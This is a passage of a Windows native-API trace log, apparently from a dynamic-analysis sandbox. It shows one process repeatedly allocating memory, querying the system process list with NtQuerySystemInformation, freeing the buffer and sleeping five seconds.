returned 0x0 [0272.239] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0272.239] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0272.240] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0272.240] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0272.240] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0272.244] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0272.244] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0272.247] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0272.247] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0272.248] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0272.248] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0272.248] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0272.252] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0272.253] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0272.254] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0272.255] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0272.256] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0272.256] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0272.256] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0272.261] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0272.261] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0272.263] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0272.263] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0272.264] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0272.264] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0272.264] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0272.268] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0272.268] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0272.270] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0272.270] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0272.271] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0272.271] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0272.271] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0272.274] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0272.275] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0272.276] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0272.277] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0272.277] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0272.277] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0272.277] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0272.283] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0272.284] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0272.285] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0272.285] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0272.286] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0272.286] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0272.286] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0272.290] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0272.290] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0272.292] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0272.292] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0272.293] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0272.293] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0272.293] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0272.296] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0272.297] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0272.298] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0272.298] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0272.299] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0272.299] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0272.299] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0272.303] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0272.304] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0272.305] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0272.305] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0272.306] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0272.306] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0272.306] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0272.310] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0272.311] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0272.312] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0272.313] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0272.314] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0272.314] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0272.314] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0272.318] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0272.319] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0272.321] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0272.321] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0272.322] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0272.323] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0272.323] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0272.326] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0272.327] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0272.329] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0272.329] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0272.330] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0272.330] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0272.330] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0272.334] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0272.335] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0272.336] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0272.337] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0272.337] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0272.338] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0272.338] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0272.341] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0272.342] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0272.343] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0272.344] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0272.345] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0272.345] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0272.345] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0272.349] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0272.360] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0272.362] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0272.362] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0272.363] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0272.364] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0272.364] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0272.369] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0272.370] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0272.372] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0272.372] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0272.373] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0272.373] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0272.373] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0272.377] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0272.378] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0272.380] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0272.380] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0272.381] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0272.382] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0272.382] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0272.387] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0272.388] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0272.390] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0272.390] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0272.391] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0272.392] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0272.392] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0272.396] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0272.397] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0272.399] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0272.399] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0272.400] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0272.400] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0272.401] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0272.405] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0272.406] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0272.407] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0272.408] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0272.409] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0272.409] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0272.409] NtQuerySystemInformation (in: 